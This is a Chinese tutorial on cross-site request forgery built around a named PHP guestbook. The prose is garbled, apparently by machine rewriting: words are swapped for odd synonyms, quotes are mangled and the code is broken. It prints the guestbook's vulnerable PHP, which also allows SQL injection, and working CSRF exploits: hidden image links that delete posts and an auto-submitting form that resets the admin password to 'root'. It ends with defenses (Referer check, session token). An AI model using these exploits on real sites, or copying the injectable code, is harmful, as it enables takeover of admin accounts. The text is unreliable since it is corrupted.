CSRF(Cross Site Request Forgeries),意为跨网站要求假造,也有写为XSRF。攻击者假造目标用户的HTTP要求,然后此要求发送到有CSRF漏洞的网站,网站实行此请 求后,引发跨站要求假造攻击。攻击者利用暗藏的HTTP连接,让目标用户在不把稳的情形下单击这个链接,由于是用户自己点击的,而他又是合法用户拥有合法 权限,以是目标用户能够在网站内实行特定的HTTP链接,从而达到攻击者的目的。
例如:某个购物网站购买商品时,采取http://www.shop.com/buy.php?item=watch&num=1,item参数确定要购买什么物品,num参数确定要购买数量,如果攻击者以隐蔽的办法发送给目标用户链接,那么如果目标用户欠妥心访问往后,购买的数量就成了1000个
实例
随缘网络PHP留言板V1.0
任意删除留言
//delbook.php 此页面用于删除留言
include_once(“dlyz.php”); //dlyz.php用户验证权限,当权限是admin的时候方可删除留言
include_once(“../conn.php”);
$del=$_GET[“del”];
$id=$_GET[“id”];
if ($del==”data”)
{
$ID_Dele= implode(“,”,$_POST[‘adid’]);
$sql=”delete from book where id in (“.$ID_Dele.”)”;
mysql_query($sql);
}
else
{
$sql=”delete from book where id=”.$id; //通报要删除的留言ID
mysql_query($sql);
}
mysql_close($conn);
echo “”;
echo “alert(‘删除成功!
’);”;
echo ” location=’book.php’;”;
echo “”;
?>
当我们具有admin权限,提交http://localhost/manage/delbook.php?id=2 时,就会删除id为2的留言
<iframe allowfullscreen=”true” allowtransparency=”true” frameborder=”0″ height=”60″ hspace=”0″ id=”aswift_1″ marginheight=”0″ marginwidth=”0″ name=”aswift_1″ scrolling=”no” style=”margin: 0px; padding: 0px; border-width: 0px; vertical-align: baseline; left: 0px; position: absolute; top: 0px;” vspace=”0″ width=”468″></iframe>利用方法:
我们利用普通用户留言(源代码办法),内容为
“delbook.php?id=2” />
“delbook.php?id=3” />
“delbook.php?id=4” />
“delbook.php?id=5” />
插入4张图片链接分别删除4个id留言,然后我们返回顾页浏览看,没有什么变革。。图片显示不了
现在我们再用管理员账号上岸后,来刷新首页,会创造留言就剩一条,其他在图片链接中指定的ID号的留言,全部都被删除。
攻击者在留言中插入隐蔽的图片链接,此链接具有删除留言的浸染,而攻击者自己访问这些图片链接的时候,是不具有权限的,以是看不到任何效果,但是当管理员上岸后,查看此留言,就会实行隐蔽的链接,而他的权限又是足够大的,从而这些留言就被删除了
修正管理员密码
//pass.php
if($_GET[“act”])
{
$username=$_POST[“username”];
$sh=$_POST[“sh”];
$gg=$_POST[“gg”];
$title=$_POST[“title”];
$copyright=$_POST[“copyright”].”
设计制作:黑客左券安全网”;
$password=md5($_POST[“password”]);
if(emptyempty($_POST[“password”]))
{
$sql=”update gly set username=’”.$username.”’,sh=”.$sh.”,gg=’”.$gg.”’,title=’”.$title.”’,copyright=’”.$copyright.”’ where id=1″;
}
else
{
$sql=”update gly set username=’”.$username.”’,password=’”.$password.”’,sh=”.$sh.”,gg=’”.$gg.”’,title=’”.$title.”’,copyright=’”.$copyright.”’ where id=1″;
}
mysql_query($sql);
mysql_close($conn);
echo “”;
echo “alert(‘修正成功!
’);”;
echo ” location=’pass.php’;”;
echo “”;
}
这个文件用于修正管理密码和网站设置的一些信息,我们可以直接布局如下表单:
<body>
<form action=”http://localhost/manage/pass.php?act=xg” method=”post” name=”form1″ id=”form1″>
<input type=”radio” value=”1″ name=”sh”>
<input type=”radio” name=”sh” checked value=”0″>
<input type=”text” name=”username” value=”root”>
<input type=”password” name=”password” value=”root”>
<input type=”text” name=”title” value=”随缘网络PHP留言板V1.0(带审核功能)” >
<textarea name=”gg” rows=”6″ cols=”80″ >欢迎您安装利用随缘网络PHP留言板V1.0(带审核功能)!
textarea>
<textarea name=”copyright” rows=”6″ cols=”80″ >随缘网络PHP留言本V1.0 版权所有:厦门随缘网络科技 2005-2009<br/>承接网站培植及系统定制 供应优惠主机域名textarea>
form>
body>
存为attack.html,放到自己网站上http://www.sectop.com/attack.html,此页面访问后会自动向目标程序的pass.php提交参数,用户名修正为root,密码修正为root,然后我们去留言板发一条留言,隐蔽这个链接,管理访问往后,他的用户名和密码全部修正成了root
戒备方法
戒备CSRF要比戒备其他攻击更加困难,由于CSRF的HTTP要求虽然是攻击者假造的,但是却是由目标用户发出的,一样平常常见的戒备方法有下面几种:
1、检讨网页的来源
2、检讨内置的隐蔽变量
3、利用POST,不要利用GET
检讨网页来源
在//pass.php头部加入以下赤色字体代码,验证数据提交
if($_GET[“act”])
{
if(isset($_SERVER[“HTTP_REFERER”]))
{
$serverhost = $_SERVER[“SERVER_NAME”];
$strurl = str_replace(“http://”,””,$_SERVER[“HTTP_REFERER”]);
$strdomain = explode(“/”,$strurl);
$sourcehost = $strdomain[0];
if(strncmp($sourcehost, $serverhost, strlen($serverhost)))
{
unset($_POST);
echo “”;
echo “alert(‘数据来源非常!’);”;
echo ” location=’index.php’;”;
echo “”;
}
}
$username=$_POST[“username”];
$sh=$_POST[“sh”];
$gg=$_POST[“gg”];
$title=$_POST[“title”];
$copyright=$_POST[“copyright”].”
设计制作:厦门随缘网络科技”;
$password=md5($_POST[“password”]);
if(emptyempty($_POST[“password”]))
{
$sql=”update gly set username=’”.$username.”’,sh=”.$sh.”,gg=’”.$gg.”’,title=’”.$title.”’,copyright=’”.$copyright.”’ where id=1″;
}
else
{
$sql=”update gly set username=’”.$username.”’,password=’”.$password.”’,sh=”.$sh.”,gg=’”.$gg.”’,title=’”.$title.”’,copyright=’”.$copyright.”’ where id=1″;
}
mysql_query($sql);
mysql_close($conn);
echo “”;
echo “alert(‘修正成功!
’);”;
echo ” location=’pass.php’;”;
echo “”;
}
检讨内置隐蔽变量
我们在表单中内置一个隐蔽变量和一个session变量,然后检讨这个隐蔽变量和session变量是否相等,以此来判断是否同一个网页所调用
php
include_once(\公众dlyz.php\"大众);include_once(\公众../conn.php\公众);if($_GET[\"大众act\"大众]){if (!isset($_SESSION[\"大众post_id\"大众])){// 天生唯一的ID,并利用MD5来加密$post_id = md5(uniqid(rand(), true));// 创建Session变量$_SESSION[\"大众post_id\公众] = $post_id;}// 检讨是否相等if (isset($_SESSION[\公众post_id\"大众])){// 不相等if ($_SESSION[\"大众post_id\公众] != $_POST[\公众post_id\公众]){// 打消POST变量unset($_POST);echo \公众<script language=’javascript’>\"大众;echo \"大众alert(‘数据来源非常!’);\公众;echo \公众 location=’index.php’;\"大众;echo \"大众script>\"大众;}}……<input type=\公众reset\公众 name=\公众Submit2\公众 value=\"大众重 置\"大众><input type=\公众hidden\公众 name=\"大众post_id\公众 value=\"大众php echo $_SESSION[\"大众post_id\"大众];?>\"大众>td>tr>table>form>php}mysql_close($conn);?></body>
</html>
利用POST,不要利用GET
通报表单字段时,一定假如用POST,不要利用GET,处理变量也不要直策应用$_REQUEST,记得无论用什么办法提交,插入数据库之前都要先处理!
!